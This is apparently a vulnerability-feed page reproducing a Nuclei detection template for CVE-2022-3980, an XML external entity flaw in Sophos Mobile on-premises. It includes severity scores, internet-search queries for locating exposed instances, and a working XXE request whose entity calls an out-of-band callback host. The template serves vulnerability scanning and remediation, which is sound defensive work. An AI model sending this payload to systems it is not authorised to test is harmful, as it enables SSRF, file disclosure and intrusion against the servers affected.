NUCLEI:CVE-2022-3980 (nuclei, ProjectDiscovery)
May 09, 2023 - 4:15 p.m.

Sophos Mobile managed on-premises - XML External Entity Injection

2023-05-09 16:15:10
ProjectDiscovery
github.com
5
sophos
mobile
xxm
ssrf
cve2022

CVSS3: 9.8
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score: 9.8
Confidence: High

EPSS: 0.389
Percentile: 97.3%

An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.

id: CVE-2022-3980

info:
  name: Sophos Mobile managed on-premises - XML External Entity Injection
  author: dabla
  severity: critical
  description: |
    An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server or conduct server-side request forgery (SSRF) attacks.
  remediation: |
    Apply the latest security patches or updates provided by Sophos to mitigate the vulnerability.
  reference:
    - https://www.sophos.com/en-us/security-advisories/sophos-sa-20221116-smc-xee
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3980
    - https://github.com/bigblackhat/oFx
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-3980
    cwe-id: CWE-611
    epss-score: 0.35251
    epss-percentile: 0.97125
    cpe: cpe:2.3:a:sophos:mobile:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sophos
    product: mobile
    shodan-query:
      - http.favicon.hash:-1274798165
      - http.title:"sophos mobile"
    fofa-query:
      - title="Sophos Mobile"
      - icon_hash=-1274798165
      - title="sophos mobile"
    google-query: intitle:"sophos mobile"
  tags: cve,cve2022,xxe,ssrf,sophos

http:
  - raw:
      - |
        @timeout: 50s
        POST /servlets/OmaDsServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: "application/xml"

        <?xml version="1.0"?>
        <!DOCTYPE cdl [<!ENTITY % test SYSTEM "http://{{interactsh-url}}">%test;]>
        <cdl>test</cdl>

    redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')"
          - "status_code == 400"
          - "len(body) == 0"
        condition: and
# digest: 4a0a00473045022100e2c1e122f1c0b31a4d9b7a1d627c23c6927ab04afc2c22896f566b22099045d20220723074a6d2578d3242ff20877ef7d2c6c783861ba9027f0fe538fa47f15a41d9:922c64590222798bb761d5b6d8e72950
